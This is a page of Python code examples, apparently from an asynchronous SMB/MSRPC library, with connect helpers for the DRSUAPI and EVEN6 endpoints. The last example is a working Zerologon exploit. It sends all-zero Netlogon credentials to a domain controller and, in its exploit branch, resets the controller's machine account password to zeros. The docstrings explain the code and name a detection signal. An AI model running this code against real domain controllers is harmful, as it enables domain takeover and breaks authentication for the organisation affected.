Ejemplo n.º 1
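    async def connect(self, open=True):
        """Locate the EVEN6 endpoint through the endpoint mapper and bind to it.

        Maps ``even6.MSRPC_UUID_EVEN6`` over ``ncacn_ip_tcp``, stores the
        resulting DCE/RPC connection in ``self.dce`` with packet-privacy
        authentication, then connects and binds it.

        Args:
            open: Accepted for signature compatibility with the sibling
                ``connect`` implementations; not used by this method.

        Returns:
            ``(True, None)`` on success, otherwise ``(False, err)`` where
            ``err`` is the error returned by the failing step or the
            exception that was raised.
        """
        # Bound before the try so the finally block never sees an unbound
        # name when the EPM constructor itself raises.
        epm = None
        try:
            epm = EPM(self.connection, protocol='ncacn_ip_tcp')
            _, err = await epm.connect()
            if err is not None:
                return False, err

            stringBinding, _ = await rr(epm.map(even6.MSRPC_UUID_EVEN6))
            self.dce = epm.get_connection_from_stringbinding(stringBinding)
            # Packet privacy: each PDU is authenticated and encrypted.
            self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

            _, err = await self.dce.connect()
            if err is not None:
                return False, err

            _, err = await self.dce.bind(even6.MSRPC_UUID_EVEN6)
            if err is not None:
                return False, err

            return True, None

        except Exception as e:
            return False, e

        finally:
            # The mapper connection is only needed to resolve the string
            # binding; the real session lives on self.dce.
            if epm is not None:
                await epm.disconnect()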
Ejemplo n.º 2
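    async def connect(self, open=False):
        """Connect to the DRSUAPI endpoint through the endpoint mapper.

        Resolves ``drsuapi.MSRPC_UUID_DRSUAPI`` over ``ncacn_ip_tcp``, stores
        the DCE/RPC connection in ``self.dce`` with packet-privacy
        authentication and connects it; optionally calls ``self.open()``.

        Args:
            open: When true, ``self.open()`` is awaited after the connection
                is established and its error, if any, is reported.

        Returns:
            ``(True, None)`` on success, otherwise ``(False, err)`` where
            ``err`` is the error returned by the failing step or the
            exception that was raised.
        """
        # Bound before the try so the finally block never sees an unbound
        # name when the EPM constructor itself raises.
        epm = None
        try:
            epm = EPM(self.connection, protocol='ncacn_ip_tcp')
            _, err = await epm.connect()
            if err is not None:
                raise err
            stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
            self.dce = epm.get_connection_from_stringbinding(stringBinding)

            # The original author flags this as mandatory: packet privacy
            # authenticates and encrypts every PDU on the DRSUAPI session.
            self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

            _, err = await self.dce.connect()
            if err is not None:
                raise err

            if open:
                _, err = await self.open()
                if err is not None:
                    raise err
            return True, None
        except Exception as e:
            # Errors returned by the steps above are re-raised so that every
            # failure funnels into this single (False, err) return.
            return False, e
        finally:
            if epm is not None:
                await epm.disconnect()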
Ejemplo n.º 3
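async def filereader_test(connection_string, filename, proxy=None):
    """Resolve the DRSUAPI endpoint via the endpoint mapper and print it.

    Args:
        connection_string: SMB connection URL understood by ``SMBConnectionURL``.
        filename: Unused; kept for signature compatibility.
        proxy: Unused; kept for signature compatibility.

    Raises:
        Whatever ``rr`` raises when the mapper connection fails (``rr`` is
        assumed to raise on a failed result), and the error object returned
        by ``epm.map`` when the lookup fails.
    """
    cu = SMBConnectionURL(connection_string)
    smb_connection = cu.get_connection()

    epm = EPM(smb_connection, protocol='ncacn_ip_tcp')
    try:
        await rr(epm.connect())
        data, exc = await epm.map(drsuapi.MSRPC_UUID_DRSUAPI)
        if exc is not None:
            raise exc
        print(data)
    finally:
        # Release the mapper connection on every exit path, as the
        # connect() helpers elsewhere in this file do.
        await epm.disconnect()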
Ejemplo n.º 4
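    async def connect(self, open=False):
        """Connect to the DRSUAPI endpoint through the endpoint mapper.

        Same sequence as the error-tuple variant of ``connect``, but every
        step goes through ``rr`` (assumed to raise on a failed result), so
        failures propagate as exceptions instead of a ``(False, err)`` tuple.

        Args:
            open: When true, ``self.open()`` is awaited after the connection
                is established.

        Returns:
            ``(True, None)`` on success.
        """
        epm = EPM(self.connection, protocol='ncacn_ip_tcp')
        try:
            await rr(epm.connect())
            stringBinding, _ = await rr(epm.map(drsuapi.MSRPC_UUID_DRSUAPI))
            self.dce = epm.get_connection_from_stringbinding(stringBinding)

            # The original author flags this as mandatory: packet privacy
            # authenticates and encrypts every PDU on the DRSUAPI session.
            self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

            await rr(self.dce.connect())

            if open:
                await rr(self.open())
            return True, None
        finally:
            # The mapper connection is only needed to resolve the string
            # binding; release it whether or not the steps above succeeded.
            await epm.disconnect()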
Ejemplo n.º 5
async def run(dc_name, dc_ip, exploit=False):
    """Probe a domain controller's Netlogon secure-channel establishment.

    Up to ``MAX_ATTEMPTS`` times (the constant is defined elsewhere in the
    file) this sends ``NetrServerReqChallenge`` followed by
    ``NetrServerAuthenticate3`` with an all-zero client credential; a zero
    ``ErrorCode`` from the server is reported as "Server is vulnerable!".
    With ``exploit=True`` the authenticate call is replaced by
    ``NetrServerPasswordSet2`` carrying an all-zero authenticator and a
    516-byte all-zero password blob for the ``<dc_name>$`` account — that
    branch writes to the DC's machine account and is not a read-only check.

    Args:
        dc_name: NetBIOS name of the DC; used for the server handle, the
            computer name and the dummy SMB URL.
        dc_ip: Not used in this function.
        exploit: Selects the ``NetrServerPasswordSet2`` branch instead of
            the ``NetrServerAuthenticate3`` probe.

    Raises:
        The error object returned by any failing EPM/DCE/NRPC call, except
        ``0xc0000022`` from the authenticate/password-set call, which only
        triggers another attempt.
    """
    #exploit = True
    #dc_name = 'WIN2019AD'
    # Server handle in the '\\NAME' form passed to the Netlogon calls below.
    dc_handle = '\\\\' + dc_name
    #dc_ip = '10.10.10.2'
    target_computer = dc_name  #without $

    # Both the client challenge and the client credential are all zeros.
    plaintext = b'\x00' * 8
    ciphertext = b'\x00' * 8

    # Standard flags observed from a Windows 10 client (including AES), with only the sign/seal flag disabled.
    flags = 0x212fffff

    # The credentials in this URL are placeholders; the object only serves as
    # the transport the endpoint mapper is reached through.
    url = SMBConnectionURL('smb2+ntlm-password://XXX\\aaa:aaa@%s' %
                           dc_name)  # dummy url to speed up the process..
    connection = url.get_connection()

    async with connection:
        epm = EPM(connection, protocol='ncacn_ip_tcp')
        _, err = await epm.connect()
        if err is not None:
            raise err
        stringBinding, err = await epm.map(nrpc.MSRPC_UUID_NRPC)
        # NOTE(review): the err returned by epm.map() above is overwritten by
        # this second connect(), so a failed endpoint lookup is never detected
        # here and stringBinding may be None when it reaches the next call.
        _, err = await epm.connect()
        if err is not None:
            raise err

        dce = epm.get_connection_from_stringbinding(stringBinding)
        # Unlike the connect() helpers elsewhere in this file, no auth level is
        # set on this connection, so the Netlogon PDUs are not sealed.
        #dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

        _, err = await dce.connect()
        if err is not None:
            raise err
        _, err = await dce.bind(nrpc.MSRPC_UUID_NRPC)
        if err is not None:
            raise err

        # Each iteration restarts the challenge/authenticate exchange. A burst
        # of such exchanges from a single client in quick succession is the
        # observable pattern a defender can alert on.
        for _ in range(0, MAX_ATTEMPTS):
            print('=====================================================')
            _, err = await nrpc.hNetrServerReqChallenge(
                dce, dc_handle + '\x00', target_computer + '\x00', plaintext)
            if err is not None:
                raise err

            if exploit is False:
                # Read-only probe: authenticate with the all-zero credential.
                server_auth, err = await nrpc.hNetrServerAuthenticate3(
                    dce, dc_handle + '\x00', target_computer + '$\x00',
                    nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                    target_computer + '\x00', ciphertext, flags)
            else:
                # Destructive branch: an all-zero authenticator and a 516-byte
                # all-zero password blob are submitted for the DC's own
                # machine account.
                authenticator = nrpc.NETLOGON_AUTHENTICATOR()
                authenticator['Credential'] = b'\x00' * 8
                authenticator['Timestamp'] = 0
                server_auth, err = await nrpc.hNetrServerPasswordSet2(
                    dce, dc_handle + '\x00', target_computer + '$\x00',
                    nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                    target_computer + '\x00', authenticator, b'\x00' * 516)

            if err is not None:
                # 0xc0000022 (STATUS_ACCESS_DENIED): this attempt was rejected;
                # any other error aborts the run.
                if err.get_error_code() == 0xc0000022:
                    continue
                else:
                    raise err

            # ErrorCode 0 means the server accepted the all-zero credential.
            if server_auth['ErrorCode'] == 0:
                print('Server is vulnerable!')
                break

        # for/else: runs only when all attempts were exhausted without a break.
        else:
            print('FAILED!')

        # NOTE(review): epm is never disconnected in this function, unlike the
        # connect() helpers above.
        await dce.disconnect()